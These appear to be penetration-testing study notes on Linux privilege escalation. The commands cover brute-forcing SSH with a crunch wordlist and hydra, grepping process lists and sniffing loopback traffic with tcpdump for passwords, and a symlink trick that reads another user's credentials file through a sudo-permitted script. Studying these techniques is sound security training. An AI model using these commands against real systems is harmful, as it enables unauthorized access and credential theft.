Exposed Confidential Information

18.3.1 - Inspecting user trails

Inspecting environment variables

env

Inspecting bashrc

cat ~/.bashrc

Create a simple wordlist (output here will be lab001, lab002, etc) which could be used in a bruteforce attack.

crunch 6 6 -t Lab%%% > wordlist

hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V

18.3.2 - Inspecting service footprints

Refresh active processes (could be used to harvest creds for example)

watch -n 1 "ps -aux | grep pass"

Perform password sniffing by capturing passwords coming into the loopback interface

sudo tcpdump -i lo -A | grep "pass"

18.3.3 - Service Exploits

Services are simply programs running in the background, accepting input or performing regular tasks. If vulnerable services are running as root, exploiting them can lead to command execution as root. Service exploits are found via Searchsploit, Google and Github.

Check more on 12.3 - Offline Exploit Resources

18.3.4 - Making a symbolic link

An example of a symbolic link (essentially an alias for another file) being used with a custom binary.

ln -sf /home/m.sander/personal/creds-for-2022.txt fk_this_box

sudo -u m.sander /usr/bin/sync.sh fk_this_box